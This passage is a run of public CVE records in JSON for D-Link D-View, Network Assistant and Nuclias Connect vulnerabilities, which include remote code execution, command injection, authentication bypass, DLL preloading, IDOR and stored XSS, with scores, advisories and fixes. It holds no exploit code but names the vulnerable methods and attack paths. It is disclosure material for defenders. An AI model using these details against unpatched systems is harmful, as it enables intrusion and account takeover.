"dateUpdated": "2024-10-07T13:25:20.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5299 (GCVE-0-2024-5299)
Vulnerability from nvd – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11 – CWE-749 - Exposed Dangerous Method or Function
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:0:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"lessThan": "2.0.3.88",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5299",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T13:43:24.500112Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:55.399Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:29:10.311Z",
"datePublic": "2024-05-14T15:21:59.534Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the execMonitorScript method. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21828."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:14.551Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5299",
"datePublished": "2024-05-23T21:30:14.551Z",
"dateReserved": "2024-05-23T21:29:10.280Z",
"dateUpdated": "2024-08-01T21:11:11.554Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5298 (GCVE-0-2024-5298)
Vulnerability from nvd – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11
- CWE-749 - Exposed Dangerous Method or Function
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | D-View | Affected: 2.0.1.28 | |
| dlink | dir-3040_firmware | Affected: 120b03 | cpe:2.3:o:dlink:dir-3040_firmware:120b03:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:dlink:dir-3040_firmware:120b03:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-3040_firmware",
"vendor": "dlink",
"versions": [
{
"status": "affected",
"version": "120b03"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5298",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T14:56:07.539620Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:54.994Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:12.163Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-449",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-449/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:29:05.253Z",
"datePublic": "2024-05-14T15:21:45.526Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View queryDeviceCustomMonitorResult Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the queryDeviceCustomMonitorResult method. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21842."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:10.037Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-449",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-449/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View queryDeviceCustomMonitorResult Exposed Dangerous Method Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5298",
"datePublished": "2024-05-23T21:30:10.037Z",
"dateReserved": "2024-05-23T21:29:05.226Z",
"dateUpdated": "2024-08-01T21:11:12.163Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5297 (GCVE-0-2024-5297)
Vulnerability from nvd – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5297",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T20:26:50.727475Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:01:59.716Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.619Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-448",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-448/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:28:59.359Z",
"datePublic": "2024-05-14T15:21:31.078Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View executeWmicCmd Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the executeWmicCmd method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21821."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:05.538Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-448",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-448/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View executeWmicCmd Command Injection Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5297",
"datePublished": "2024-05-23T21:30:05.538Z",
"dateReserved": "2024-05-23T21:28:59.330Z",
"dateUpdated": "2024-08-01T21:11:11.619Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5296 (GCVE-0-2024-5296)
Vulnerability from nvd – Published: 2024-05-23 21:29 – Updated: 2024-08-01 21:11
- CWE-321 - Use of Hard-coded Cryptographic Key
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:2.0.1.28:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5296",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T13:11:43.781611Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T20:06:43.118Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.620Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-447",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-447/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:28:51.915Z",
"datePublic": "2024-05-14T15:21:23.062Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the TokenUtils class. The issue results from a hard-coded cryptographic key. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-21991."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-321",
"description": "CWE-321: Use of Hard-coded Cryptographic Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:29:58.566Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-447",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-447/"
}
],
"source": {
"lang": "en",
"value": "Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative"
},
"title": "D-Link D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5296",
"datePublished": "2024-05-23T21:29:58.566Z",
"dateReserved": "2024-05-23T21:28:51.883Z",
"dateUpdated": "2024-08-01T21:11:11.620Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5292 (GCVE-0-2024-5292)
Vulnerability from nvd – Published: 2024-05-23 21:29 – Updated: 2024-08-01 21:11
- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Network Assistant | Affected: 4.0.0.21 | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5292",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T17:20:09.250048Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:34.127Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:12.662Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-443",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-443/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "Network Assistant",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "4.0.0.21"
}
]
}
],
"dateAssigned": "2024-05-23T21:22:34.380Z",
"datePublic": "2024-05-14T15:20:54.270Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link Network Assistant Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of D-Link Network Assistant. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the DNACore service. The service loads a file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-21426."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427: Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:29:37.136Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-443",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-443/"
}
],
"source": {
"lang": "en",
"value": "Xavier DANEST"
},
"title": "D-Link Network Assistant Uncontrolled Search Path Element Local Privilege Escalation Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5292",
"datePublished": "2024-05-23T21:29:37.136Z",
"dateReserved": "2024-05-23T21:22:34.350Z",
"dateUpdated": "2024-08-01T21:11:12.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-23754 (GCVE-0-2026-23754)
Vulnerability from cvelistv5 – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09
- CWE-639 - Authorization Bypass Through User-Controlled Key
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisory, patch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:04.543748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:54.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:23.656Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 IDOR Allows Credential Disclosure and Account Takeover",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23754",
"datePublished": "2026-01-21T18:02:45.878Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:23.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23755 (GCVE-0-2026-23755)
Vulnerability from cvelistv5 – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09
- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisory, patch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23755",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:07.575974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:59.815Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:24.354Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 Installer DLL Preloading via Uncontrolled Search Path",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23755",
"datePublished": "2026-01-21T18:02:30.160Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:24.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34253 (GCVE-0-2025-34253)
Vulnerability from cvelistv5 – Published: 2025-10-16 18:53 – Updated: 2026-05-14 02:07
- CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect | Affected: 0 , < 1.3.1.4 (custom) | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34253",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:28:34.087394Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:28:40.054Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThan": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
